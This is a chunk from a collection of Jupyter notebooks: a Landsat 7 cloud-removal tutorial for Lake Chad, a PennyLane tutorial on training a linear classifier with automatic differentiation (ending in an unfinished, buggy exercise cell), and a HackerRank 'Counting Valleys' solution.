save_img(prediction.cpu().data, name[0])\n\n\n", "/tmp/ipykernel_1942169/1991822337.py:2: UserWarning: volatile was removed and now has no effect. Use `with torch.no_grad():` instead.\n input_i,input_rgb, name = Variable(batch[0],volatile=True),Variable(batch[1],volatile=True), batch[2]\nLossy conversion from float32 to uint8. Range [0.0, 255.0]. Convert image to uint8 prior to saving to suppress this warning.\n" ] ] ]
[ "code" ]
[ [ "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code", "code" ] ]
cb1d2f909c4c5637fdb47b0e89f23c23f37fa8d5
25,669
ipynb
Jupyter Notebook
notebooks/IGARSS/igarss_chad_02.ipynb
admariner/data_cube_notebooks
984a84b2f92114040e36a533d3f476dcf384695e
[ "Apache-2.0" ]
null
null
null
notebooks/IGARSS/igarss_chad_02.ipynb
admariner/data_cube_notebooks
984a84b2f92114040e36a533d3f476dcf384695e
[ "Apache-2.0" ]
null
null
null
notebooks/IGARSS/igarss_chad_02.ipynb
admariner/data_cube_notebooks
984a84b2f92114040e36a533d3f476dcf384695e
[ "Apache-2.0" ]
null
null
null
31.886957
424
0.5837
[ [ [ "# Enable importing of utilities\nimport sys\nsys.path.append('..')\n%matplotlib inline", "_____no_output_____" ] ], [ [ "# Cleaning up imagery for pre and post rainy season\n\nThe [previous tutorial](igarrs_chad_01.ipynb) addressed the identifying the extent of the rainy season near Lake Chad. This tutorial will focus on cleaning up optical imagery to make it suitable for water-detection algorithms. \n \n<br> ", "_____no_output_____" ], [ "# What to expect from this notebook\n\n- Introduction to landsat 7 data.\n- basic xarray manipulations \n- removing clouds and scanline error using `pixel_qa`\n- building a composite image \n- saving products \n\n<br> \n\n# Algorithmic process \n<br>\n\n![](../diagrams/rainy_demo/alg_jn2_02.png)\n\n<br> \nThe algorithmic process is fairly simple. It is a composable chain of operations on landsat 7 imagery. The goal is to create a **scanline free** and **cloud-free** representation of the data for **pre** and **post** rainy season segments of 2015. The process is outlined as follows: \n\n1. load landsat imagery data for 2015 \n2. isolate pre and post rainy season data \n3. remove clouds and scan-line errors from pre and post rainy sesaon data. \n4. build a cloud free composite for pre and post rainy sesaon data. \n5. export the data for future use \n\nWhat scanline-free or cloud-free means will be addressed later in the tutorial. To understand everything, just follow the steps in sequence. \n\n", "_____no_output_____" ], [ "# Creating a Datacube Object \n<br>\nThe following code connects to the datacube and accepts `cloud_removal_in_chad` as an app-name. The app name is typically only used in logging and debugging. \n<br>", "_____no_output_____" ] ], [ [ "import datacube\ndc = datacube.Datacube(app = \"cloud_removal_in_chad\") ", "_____no_output_____" ] ], [ [ "<br> \n\nLike in the previous tutorial. The datacube object will be used to load data that has previously been ingested by the datacube. \n \n<br>", "_____no_output_____" ], [ "## Defining the boundaries of the area and restricting measurements", "_____no_output_____" ] ], [ [ "## Define Geographic boundaries using a (min,max) tuple.\nlatitude = (12.75, 13.0)\nlongitude = (14.25, 14.5)\n\n## Specify a date range using a (min,max) tuple \nfrom datetime import datetime\ntime = (datetime(2015,1,1), datetime(2016,1,1))\n\n## define the name you gave your data while it was being \"ingested\", as well as the platform it was captured on. \nplatform = 'LANDSAT_7' \nproduct = 'ls7_ledaps_lake_chad_full' \n\nmeasurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']", "_____no_output_____" ] ], [ [ "As a reminder and in-notebook reference, the following line of code displays the extents of the study area. Re-orient yourself with it. ", "_____no_output_____" ] ], [ [ "from utils.data_cube_utilities.dc_display_map import display_map\ndisplay_map(latitude = (12.75, 13.0),longitude = (14.25, 14.5)) ", "_____no_output_____" ] ], [ [ "<br> \n\n## Loading in Landsat 7 imagery \nThe following code loads in landsat 7 imagery using the constraints defined above", "_____no_output_____" ] ], [ [ "#Load Landsat 7 data using parameters,\nlandsat_data = dc.load(latitude = latitude,\n longitude = longitude,\n time = time,\n product = product,\n platform = platform,\n measurements = measurements)", "_____no_output_____" ] ], [ [ "<a id='#intro_ls7'></a> \n\n# Explore the Landsat 7 dataset\n\nThe previous tutorial barely grazed the concept of xarray variables. \nTo understand how we use landsat7 imagery it will be necessary to make a brief detour and explain it in greater detail. \n<br> \n\n### xarray - Variables & Data-arrays \nWhen you output the contents of your loaded -dataset... \n", "_____no_output_____" ] ], [ [ "print(landsat_data)", "_____no_output_____" ] ], [ [ "<br> \n.. you should notice a list of values called data-variables.\n\n<br> \n\nThese 'variables' are really 3 dimensional [data-arrays](http://xarray.pydata.org/en/stable/data-structures.html) housing values like 'red', 'green', 'blue', and 'nir', values for each lat,lon,time coordinate pair in your dataset. Think of an [xarray.Dataset](http://xarray.pydata.org/en/stable/data-structures.html#dataset) as an object that houses many different types of data under a shared coordinate system. \n<br> \n \n![](diagrams/rainy_demo/ls7_xarray.png) \n\n<br> \n\nIf you wish to fetch certain data from your dataset you can call it by its variable name. So, if for example, you wanted to get the near-infrared data-array from the dataset, you would just index it like so: \n<br> ", "_____no_output_____" ] ], [ [ "landsat_data.nir ", "_____no_output_____" ] ], [ [ "<br> \n\nThe object printed above is a [data-array](http://xarray.pydata.org/en/stable/generated/xarray.DataArray.html). Unlike a data-set, data-arrays only house one type of data and has its own set of attributes and functions. \n \n<br> ", "_____no_output_____" ], [ "### xarray - Landsat 7 Values \nLet's explore landsat datasets in greater detail by starting with some background about what sort of data landsat satellites collect... \n \nIn layman terms, Landsat satellites observe light that is reflected or emitted from the surface of the earth.\n\n<br> \n \n![](../diagrams/rainy_demo/visual_spectrum.jpg)\n\n<br>\n\nIn landsat The spectrum for observable light is split up into smaller sections like 'red', 'green', 'blue', 'thermal','infrared' so-on and so forth... \n\n\nEach of these sections will have some value denoting how much of that light was reflected from each pixel. The dataset we've loaded in contains values for each of these sections in separate data-arrays under a shared dataset. \n\nThe ones used in this series of notebooks are: \n\n- `red`\n- `green` \n- `blue`\n- `nir` - near infrared\n- `swir1` - band for short wave infrared \n- `swir2` - band for short wave infrared\n\nThere is an alternative band attached to the Landsat7 xarray dataset called pixel qa.\n\n- `pixel_qa` - land cover classifications", "_____no_output_____" ], [ "### Taking a look at landsat data taken on July 31st, 2015 \n\nThe data listed above can be used in conjunction to display a visual readout of the area. The code below will use our `red` `green`, and `blue` values to produce a **png** of one of our time slices. ", "_____no_output_____" ] ], [ [ "## The only take-away from this code should be that a .png is produced. \n## Any details about how this function is used is out of scope for this tutorial \n\nfrom utils.data_cube_utilities.dc_utilities import write_png_from_xr\nwrite_png_from_xr('../demo/landsat_rgb.png', landsat_data.isel(time = 11), [\"red\", \"green\", \"blue\"], scale = [(0,2000),(0,2000),(0,2000)])", "_____no_output_____" ] ], [ [ "![](demo/landsat_rgb.png)", "_____no_output_____" ], [ "# The need to clean up imagery\n\nConsidering the imagery above. It is hard to build a comprehensive profile on landcover. There are several objects that occlude the surface of the earth. Namely errors introduced by an SLC malfunction, as well as cloud cover. \n\n### Scanline Gaps \n\nIn May of 2003, Landsat7's scan line correction system failed (SLC). This essentially renders several horizontal rows of imagery unusable for analysis. Luckily, these scanline gaps don't always appear in the same spots. With enough imagery, a \"gap-less\" representation can be constructed that we can use to analyze pre and post rainy season. \n \n<br> \n\n![](diagrams/rainy_demo/slc_error_02.PNG)\n\n<br> \n \n \n### Cloud occlusion \n \nClouds get in the way of analyzing/observing the surface reflectance values of Lake Chad. Fortunately, like SLC gaps, clouds don't always appear in the same spot. With enough imagery, taken at close enough intervals, a \"cloudless\" representation of the area can be built for pre and post rainy season acquisitions of the region. \n\n<br> \n \n ![](diagrams/rainy_demo/cloud_clip_01.PNG)\n \n<br> \n\n>**Strong Assumptions** \n>In this analysis, strong assumptions are made regarding the variability of lake size in the span of a few acquisitions.(Namely, that the size in a pre-rainy season won't vary as much as it will after the rainy season contributes to the surface area of the lake) \n\n", "_____no_output_____" ], [ "# Cleaning up Pre and Post rainy season Imagery ", "_____no_output_____" ], [ "### Splitting the dataset in two \nThe first step to cleaning up pre and post rainy season imagery is to split our year's worth of acquisitions into two separate datasets. In the previous notebooks, We've discovered that an appropriate boundary for the rainy season is sometime between June and October. For the sake of this notebook, we'll choose the first day in both months. \n<br> ", "_____no_output_____" ] ], [ [ "start_of_rainy_season = '2015-06-01'\nend_of_rainy_season = '2015-10-01'", "_____no_output_____" ] ], [ [ "<br> \nThe next step after defining this would be to define the time ranges for both post and pre, then use them to select subsections from the original dataset to act as two separate datasets. (Like in the diagram below) \n\n<br> \n\n![](diagrams/rainy_demo/split_02.png) \n\n<br>", "_____no_output_____" ] ], [ [ "start_of_year = '2015-01-01'\nend_of_year = '2015-12-31'\n\npre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))\npost = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))", "_____no_output_____" ] ], [ [ "<br> \n\n# Building a cloud-free and gap-free representation \n\nThis section of the process works s by masking out clouds and gaps from the imagery and then selecting a median valued cloud/scanline-gap free pixels of an image. \n \n![](diagrams/rainy_demo/cleanup.png)\n \n<br> \n \n- Masking is done using the **pixel_qa** variable. \n- The gap/cloud-free compositing is done using a technique called **median-pixel-mosaicing** \n\n<br> ", "_____no_output_____" ], [ "\n### Masking out clouds and SLC gaps using `pixel_qa`\nWe're going to be using one of our loaded values called `pixel_qa` for the masking step. \n\n`pixel_qa` doesn't convey surface reflectance intensities. Instead, it is a band that contains more abstract information for each pixel. It places a pixel under one or more of the following categories: \n\n- `clear` - pixel is likely normal landcover \n- `water` - pixel is likely water \n- `cloud_shadow` - pixel is likely in the shadow of a cloud \n- `snow` - the pixel is likely snowy \n- `cloud` - the pixel is likely cloudy \n- `fill` - the pixel is classified as not fit for analysis (SRC-Gaps fall in this classification) \n\nWe will use these classifications to mask out values unsuitable for analysis. \n", "_____no_output_____" ], [ "### A Masking Function \nThe masking step will have to make use of a very peculiar encoding for each category. \n<br> \n\n\\begin{array}{|c|c|}\n\\hline bit & value & sum & interpretation \\\\\\hline\n \t\t0 & 1 & 1 & Fill \\\\\\hline \n 1 & 2 & 3 & Clear \\\\\\hline\n 2 & 4 & 7 & Water \\\\\\hline\n 3 & 8 & 15 & Cloud Shadow \\\\\\hline\n 4 & 16 & 31 & Snow \\\\\\hline\n 5 & 32 & 63 & Cloud \\\\\\hline\n 6 & 64 & 127 & Cloud Confidence \\\\\n &&& 00 = None \\\\\n 7& 128& 255 & 01 = Low \\\\\n &&& 10 = Med \\\\\n &&& 11 = High \\\\\\hline \n \\end{array} \n \n<br> \n\nThe following function was constructed to mask out anything that isn't **clear** or **water**. \n<br> ", "_____no_output_____" ] ], [ [ "import numpy as np \n\ndef cloud_and_slc_removal_mask(dataset):\n #Create boolean Masks for clear and water pixels\n clear_pixels = dataset.pixel_qa.values == 2 + 64\n water_pixels = dataset.pixel_qa.values == 4 + 64\n \n a_clean_mask = np.logical_or(clear_pixels, water_pixels)\n return a_clean_mask", "_____no_output_____" ] ], [ [ "<br> \nThe following code creates a **boolean** mask, for slc code. \n<br> ", "_____no_output_____" ] ], [ [ "mask_for_pre = cloud_and_slc_removal_mask(pre)\nmask_for_post = cloud_and_slc_removal_mask(post) ", "_____no_output_____" ] ], [ [ "<br> \nA boolean mask is essentially what it sounds like. Let's look at its print-out \n\n<br> ", "_____no_output_____" ] ], [ [ "print(mask_for_post)", "_____no_output_____" ] ], [ [ "<br> \n\nThis boolean mask contains a **true** value for pixels that are clear and un-occluded by clouds or scanline gaps and **false** values where the opposite is true. \n<br> \n\n### Example of mask use \n\nThere are many ways to apply a mask. The following example is the xarray way. It will apply *nan* values to areas with clouds or scanline issues: \n<br>", "_____no_output_____" ] ], [ [ "pre.where(mask_for_pre)", "_____no_output_____" ] ], [ [ "Notice that a lot of the values in the array above have nan values. Compositing algorithms like the **median-pixel mosaic** below, make use of this **where** function as well as 'nans' as the marker for no-data values. ", "_____no_output_____" ], [ "<br> \n### Median Pixel Mosaic\nA median pixel mosaic is used for our cloud/slc-gap free representation of satellite imagery. It Works by masking out clouds/slc-gaps from imagery, and using the median valued cloud-free pixels in the time series of each lat-lon coordinate pair \n\n<br> \n![](diagrams/rainy_demo/median_comp.png)\n \n", "_____no_output_____" ], [ "Here is a function we can use to build our mosaic. Its exact mechanics are abstracted away from this tutorial and can be explored in further detail by visiting [our github](https://github.com/ceos-seo/data_cube_utilities/blob/master/dc_mosaic.py). \n<br>", "_____no_output_____" ] ], [ [ "from utils.data_cube_utilities.dc_mosaic import create_median_mosaic\n\ndef mosaic(dataset, mask):\n return create_median_mosaic(dataset, clean_mask = mask)", "_____no_output_____" ] ], [ [ "<br>\nLets use it to generate our cloud free representations of the area: \n<br> ", "_____no_output_____" ] ], [ [ "clean_pre = mosaic(pre, mask_for_pre) \nclean_post = mosaic(post, mask_for_post)", "_____no_output_____" ] ], [ [ "<br>\n# Taking a peek at our cloud-free composites\n<br> \n### Pre Rainy Season ", "_____no_output_____" ] ], [ [ "print(clean_pre) ", "_____no_output_____" ], [ "write_png_from_xr('../demo/pre_rain_mosaic.png', clean_pre, [\"red\", \"green\", \"blue\"], scale = [(0,2000),(0,2000),(0,2000)])", "_____no_output_____" ] ], [ [ "Your png should look something like this: \n![](demo/pre_rain_mosaic.png) ", "_____no_output_____" ], [ "### Post Rainy Season \n", "_____no_output_____" ] ], [ [ "print(clean_post) ", "_____no_output_____" ], [ "write_png_from_xr('../demo/post_rain_mosaic.png', clean_post, [\"red\", \"green\", \"blue\"], scale = [(0,2000),(0,2000),(0,2000)])", "_____no_output_____" ] ], [ [ "![](demo/post_rain_mosaic.png) ", "_____no_output_____" ], [ "# Next Steps\n\nThe [next notebook](igarss_chad_03.ipynb) in the series deals with water classification on these cloud free composites! We'll need to save our work so that it can be loaded in the next notebook. The good news is that xarrays closely resemble the structure of net NETCDF files. It would make sense to save it off in that format. The code below saves these files as NETCDFS using built-in export features of xarray. ", "_____no_output_____" ] ], [ [ "## Lets drop pixel qa since it doesn't make sense to house it in a composite. \nfinal_post = clean_post.drop('pixel_qa')\nfinal_pre = clean_pre.drop('pixel_qa')\n\nfinal_post.to_netcdf('../demo/post_rain.nc')\nfinal_pre.to_netcdf('../demo/pre_rain.nc')", "_____no_output_____" ] ], [ [ " The entire notebook has been condensed down to a about 2 dozen lines of code below.", "_____no_output_____" ] ], [ [ "import datacube\nfrom datetime import datetime\nfrom utils.data_cube_utilities.dc_mosaic import create_median_mosaic\n\ndef mosaic(dataset, mask):\n return create_median_mosaic(dataset, clean_mask = mask)\n\ndef cloud_and_slc_removal_mask(dataset):\n clear_pixels = dataset.pixel_qa.values == 2 + 64\n water_pixels = dataset.pixel_qa.values == 4 + 64\n a_clean_mask = np.logical_or(clear_pixels, water_pixels)\n return a_clean_mask\n\n#datacube obj\ndc = datacube.Datacube(app = \"cloud_removal_in_chad\", config = '/home/localuser/.datacube.conf') \n\n#load params\nlatitude = (12.75, 13.0)\nlongitude = (14.25, 14.5)\ntime = (datetime(2015,1,1), datetime(2016,1,1))\n\nplatform = 'LANDSAT_7' \nproduct = 'ls7_ledaps_lake_chad_full' \nmeasurements = ['red', 'green', 'blue', 'nir', 'swir1', 'swir2','pixel_qa']\n\n#load\nlandsat_data = dc.load(latitude = latitude, longitude = longitude, time = time, product = product, platform = platform, measurements = measurements)\n\n#time split params\nstart_of_rainy_season = '2015-06-01'\nend_of_rainy_season = '2015-10-01'\nstart_of_year = '2015-01-01'\nend_of_year = '2015-12-31'\n\n#time split\npre = landsat_data.sel(time = slice(start_of_year, start_of_rainy_season))\npost = landsat_data.sel(time = slice(end_of_rainy_season, end_of_year))\n\n#mask for mosaic processs\nmask_for_pre = cloud_and_slc_removal_mask(pre)\nmask_for_post = cloud_and_slc_removal_mask(post) \n\n#mosaic process\nclean_pre = mosaic(pre, mask_for_pre) \nclean_post = mosaic(post, mask_for_post)\n\n#save file\nclean_pre.drop('pixel_qa').to_netcdf('../demo/pre_01.cd')\nclean_post.drop('pixel_qa').to_netcdf('../demo/post_01.cd')", "_____no_output_____" ] ] ]
[ "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ] ]
cb1d31dacc9b3fb7de29bba8d7fa69b2600eb25a
126,734
ipynb
Jupyter Notebook
1_classical_ml_with_automatic_differentiation.ipynb
SaashaJoshi/pennylane-demo-cern
d1ff6fa54b226c40bea24d38d53a9685b447bee4
[ "Apache-2.0" ]
null
null
null
1_classical_ml_with_automatic_differentiation.ipynb
SaashaJoshi/pennylane-demo-cern
d1ff6fa54b226c40bea24d38d53a9685b447bee4
[ "Apache-2.0" ]
null
null
null
1_classical_ml_with_automatic_differentiation.ipynb
SaashaJoshi/pennylane-demo-cern
d1ff6fa54b226c40bea24d38d53a9685b447bee4
[ "Apache-2.0" ]
null
null
null
132.98426
23,414
0.851752
[ [ [ "<a href=\"https://colab.research.google.com/github/SaashaJoshi/pennylane-demo-cern/blob/main/1_classical_ml_with_automatic_differentiation.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>", "_____no_output_____" ] ], [ [ "%%capture \n\n# Comment this out if you don't want to install pennylane from this notebook\n!pip install pennylane\n\n# Comment this out if you don't want to install matplotlib from this notebook\n!pip install matplotlib", "_____no_output_____" ] ], [ [ "# Training a machine learning model with automatic differentiation", "_____no_output_____" ], [ "In this tutorial we will: \n\n* implement a toy version of a typical machine learning setup,\n* understand how automatic differentiation allows us to compute gradients of the machine learning model, and\n* use automatic differentiation to train the model.\n\nFirst some imports...", "_____no_output_____" ] ], [ [ "import pennylane as qml\nfrom pennylane import numpy as np # This will import a special, \"differentiable\" version of numpy.\n\nimport matplotlib.pyplot as plt\n%matplotlib inline\n\nnp.random.seed(42)", "_____no_output_____" ], [ "np.array([0.1, -0.9]) # This is a tensor array with gradient", "_____no_output_____" ], [ "import numpy as vanilla_np\n\nvanilla_np.array([0.1, -0.9])", "_____no_output_____" ], [ "x_axis = np.linspace(0, 6)\nfunction_sin = np.sin(x_axis)\n\nplt.plot(x_axis, function_sin)", "_____no_output_____" ], [ "# We can find the gradient of the above function too. \n# In a vanilla numpy version, we cannot differentiate!\n\ngradient_fnc = qml.grad(np.sin, argnum = 0)\n\ng = [gradient_fnc(x) for x in x_axis]\n\nplt.plot(x_axis, function_sin)\nplt.plot(x_axis, g)", "_____no_output_____" ] ], [ [ "## 1. The three basic ingredients", "_____no_output_____" ], [ "A machine learning problem usually consists of *data*, a *model (family)* and a *cost function*: \n\n<br />\n<img src=\"https://github.com/XanaduAI/pennylane-demo-cern/blob/main/figures/data-model-cost.png?raw=1\" width=\"500\">\n<br />\n\n*Training* selects the best model from the family by minimising the cost on a training set of data samples. If we design the optimisation problem well, the trained model will also have a low cost on new sets of data samples that have not been used in training. This means that the model *generalises* well. \n\nWe will now create examples for each ingredient.", "_____no_output_____" ], [ "### Data\n\nLet us create a two-dimensional toy dataset.", "_____no_output_____" ] ], [ [ "n_samples = 100\nX0 = np.array([[np.random.normal(loc=-1, scale=1), \n np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)]) \nX1 = np.array([[np.random.normal(loc=1, scale=1), \n np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)]) \nX = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.\nY = np.concatenate([-np.ones(50), np.ones(50)], axis=0)\ndata = list(zip(X, Y))\n\n\nplt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\nplt.show()", "_____no_output_____" ], [ "X.shape", "_____no_output_____" ] ], [ [ "### Model family\n\nNext, we construct a linear model.", "_____no_output_____" ] ], [ [ "def model(x, w):\n return np.dot(x, w)", "_____no_output_____" ] ], [ [ "Let's try it out.", "_____no_output_____" ] ], [ [ "w = np.array([-0.5, -0.2])\n\nmodel(X0[0], w)\n# model(X0[1], w)\n\n# If we put a threshold at zero (0), X0[0] would be classified in class +1 and X0[1] will be classified in class -1", "_____no_output_____" ] ], [ [ "We can plot the decision boundary, or the boundary in data space where the model flips from a negative to a positive prediction", "_____no_output_____" ] ], [ [ "plt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\n\nplt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')\nplt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')\nplt.show()", "_____no_output_____" ] ], [ [ "### Cost function\n\nHow good is the model on a single input-output training pair?", "_____no_output_____" ] ], [ [ "def loss(a, b):\n return (a - b)**2 # Square of difference.", "_____no_output_____" ] ], [ [ "What is the average loss on a data set of multiple pairs?", "_____no_output_____" ] ], [ [ "def average_loss(w, data):\n c = 0\n for x, y in data:\n prediction = model(x, w)\n c += loss(prediction, y)\n return c/len(data)", "_____no_output_____" ], [ "w = np.array([1.3, -0.4])\naverage_loss(w, data)", "_____no_output_____" ] ], [ [ "## 2. Automatic computation of gradients\n\nBecause we imported PennyLane's numpy version, we can now compute gradients of the average loss with respect to the weights!", "_____no_output_____" ] ], [ [ "gradient_fn = qml.grad(average_loss, argnum=0)\ngradient_fn(w, data)", "_____no_output_____" ] ], [ [ "We can use gradients to guess better candidates for parameters.", "_____no_output_____" ] ], [ [ "w_new = w - 0.05*gradient_fn(w, data)", "_____no_output_____" ], [ "average_loss(w_new, data)", "_____no_output_____" ] ], [ [ "This works because the gradient always points towards the steepest ascent in the cost landscape.", "_____no_output_____" ] ], [ [ "# compute the gradient at some point in parameter space\nsome_w = np.array([-0.6, 0.5])\ng = 0.01*gradient_fn(some_w, data)\n# learning rate = 0.01 here above!\n\n# make a contourplot of the cost\nw1s = np.linspace(-2, 2)\nw2s = np.linspace(-2, 2)\ncost_grid = []\nfor w1 in w1s:\n for w2 in w2s:\n w = np.array([w1, w2])\n cost_grid.append(average_loss(w, data))\ncost_grid = np.array(cost_grid).reshape((50, 50))\nplt.contourf(w1s, w2s, cost_grid.T)\n\nplt.arrow(some_w[0], some_w[1], some_w[0] + g[0], some_w[1] + g[1], \n head_width=0.3, head_length=0.3, fc='r', ec='r')\nplt.xlabel(r\"$w_1$\")\nplt.ylabel(r\"$w_2$\")\nplt.show()", "_____no_output_____" ] ], [ [ "## 3. Training with gradient descent\n\nPutting it all together, we can train the linear model.", "_____no_output_____" ] ], [ [ "w_init = np.random.random(size=(2,))\nw = np.array(w_init)\n\nhistory = []\nfor i in range(15):\n w_new = w - 0.05*gradient_fn(w, data)\n print(average_loss(w_new, data))\n history.append(w_new)\n w = w_new", "1.3500100407100541\n1.102185220934838\n0.9290184060813585\n0.8027576735134763\n0.7073372523673335\n0.6331673539752455\n0.5743007976098509\n0.5268826928791955\n0.488294380852497\n0.45667438524266574\n0.4306452071742513\n0.4091534224361\n0.3913728909446769\n0.376643727003794\n0.3644320177904416\n" ] ], [ [ "We can easily visualise the path that gradient descent took in parameter space.", "_____no_output_____" ] ], [ [ "plt.contourf(w1s, w2s, cost_grid.T)\nhistory = np.array(history)\nplt.plot(history[:, 0], history[:, 1], \"-o\")\nplt.xlabel(r\"$w_1$\")\nplt.ylabel(r\"$w_2$\")\nplt.show()", "_____no_output_____" ] ], [ [ "Training didn't fully converge yet, but the decision boundary is already better.", "_____no_output_____" ] ], [ [ "plt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\n\nplt.arrow(0, 0, w[0], w[1], head_width=0.3, head_length=0.3, fc='r', ec='r')\nplt.plot([-3*w[1], 3*w[1]], [3*w[0], -3*w[0]], 'k-')\nplt.show()", "_____no_output_____" ] ], [ [ "# TASKS \n\n\n\n1. Add a constant scalar bias term $b \\in \\mathbb{R}$ to the model,\n\n $$ f(x, w) = \\langle w, x \\rangle + b, $$\n\n and train both $w$ and $b$ at the same time.\n \n\n2. Change the model to a neural network with a single hidden layer.\n\n $$ f(x, w, W) = \\langle w, \\varphi(Wx) \\rangle,$$\n\n where $W$ is a weight matrix of suitable dimension and $\\varphi$ a hand-coded nonlinar activation function. \n \n Tipp: You can use the vector-valued sigmoid function \n \n ```\n def sigmoid(z):\n return 1/(1 + np.exp(-x))\n ```\n \n\n3. Code up the above example using PyTorch.", "_____no_output_____" ] ], [ [ "n_samples = 100\nX0 = np.array([[np.random.normal(loc=-1, scale=1), \n np.random.normal(loc=1, scale=1)] for i in range(n_samples//2)]) \nX1 = np.array([[np.random.normal(loc=1, scale=1), \n np.random.normal(loc=-1, scale=1)] for i in range(n_samples//2)]) \nX = np.concatenate([X0, X1], axis=0) # Concatenate both X0 and X1 into a single tensor.\nY = np.concatenate([-np.ones(50), np.ones(50)], axis=0)\ndata = list(zip(X, Y))\n\n\nplt.scatter(X0[:,0], X0[:,1])\nplt.scatter(X1[:,0], X1[:,1])\nplt.show()", "_____no_output_____" ], [ "samples = 100\n\n# Class 1\nX_1 = np.array([[np.random.normal, np.random.normal] for i in range(samples//2)])\n\n# Class 2\nX_2 = np.array([[np.random.normal, np.random.normal] for i in range(samples//2)])\n\n# Bias\nbias = np.array([n.random.normal] for i in range(samples))\n\nX = np.concatenate([X_1, X_2], axis = 0)\nX_data = np.add(X, bias)\n\nY_class_data = np.concatenate([-np.ones(50), np.ones(50)], axis = 0)\n\ndata = list(zip(X_data, Y_class_data))\n\nprint(X_data)", "_____no_output_____" ], [ "", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ] ]
cb1d3b241e2c9bc155330d36ae84778a65b2c998
5,957
ipynb
Jupyter Notebook
HackerRank/counting_valleys.ipynb
shaunhyp57/coding_practice
bb25385c605d4ab406ca52ccb48293e467711d68
[ "MIT" ]
null
null
null
HackerRank/counting_valleys.ipynb
shaunhyp57/coding_practice
bb25385c605d4ab406ca52ccb48293e467711d68
[ "MIT" ]
null
null
null
HackerRank/counting_valleys.ipynb
shaunhyp57/coding_practice
bb25385c605d4ab406ca52ccb48293e467711d68
[ "MIT" ]
null
null
null
27.967136
396
0.459795
[ [ [ "## **Counting Valleys** - HackerRank\n\nGary is an avid hiker. He tracks his hikes meticulously, paying close attention to small details like topography. During his last hike he took exactly $n$ steps. For every step he took, he noted if it was an uphill, $U$, or a downhill, $D$ step. Gary's hikes start and end at sea level and each step up or down represents a $1$ unit change in altitude. We define the following terms:\n\n* A mountain is a sequence of consecutive steps above sea level, starting with a step up from sea level and ending with a step down to sea level.\n* A valley is a sequence of consecutive steps below sea level, starting with a step down from sea level and ending with a step up to sea level.\nGiven Gary's sequence of up and down steps during his last hike, find and print the number of valleys he walked through.\n\nFor example, if Gary's path is $s = [DDUUUUDD]$, he first enters a valley $2$ units deep. Then he climbs out an up onto a mountain units high. Finally, he returns to sea level and ends his hike.\n\n**Function Description**\n\nComplete the countingValleys function in the editor below. It must return an integer that denotes the number of valleys Gary traversed.\n\ncountingValleys has the following parameter(s):\n\n* n: the number of steps Gary takes\n* s: a string describing his path\n\n**Input Format**\n\nThe first line contains an integer $n$, the number of steps in Gary's hike.\nThe second line contains a single string $s$, of $n$ characters that describe his path.\n\n**Constraints**\n* $2 \\leq n \\leq 10^6$\n* $s[i] \\in {UD}$\n\n**Output Format**\n\nPrint a single integer that denotes the number of valleys Gary walked through during his hike.\n\n**Sample Input**", "_____no_output_____" ], [ "```\n8\nUDDDUDUU\n```", "_____no_output_____" ], [ "**Sample Output**", "_____no_output_____" ], [ "```\n1\n```", "_____no_output_____" ], [ "**Explanation**\n\nIf we represent _ as sea level, a step up as /, and a step down as \\, Gary's hike can be drawn as:", "_____no_output_____" ], [ "```\n_/\\ _\n \\ /\n \\/\\/\n```", "_____no_output_____" ], [ "He enters and leaves one valley.", "_____no_output_____" ] ], [ [ "def countingValleys(n, s):\n # start of solution\n level = 0\n valley = 0\n for steps in s:\n if steps == 'U':\n level += 1\n if level == 0:\n # exit valley\n valley += 1\n else:\n level -= 1\n return valley\n # end of solution", "_____no_output_____" ], [ "n = len('UDDDUDUU')\ns = 'UDDDUDUU'\n\nprint(countingValleys(n, s))", "1\n" ], [ "n = len('DDUUDDUDUUUD')\ns = 'DDUUDDUDUUUD'\n\nprint(countingValleys(n, s))", "2\n" ] ] ]
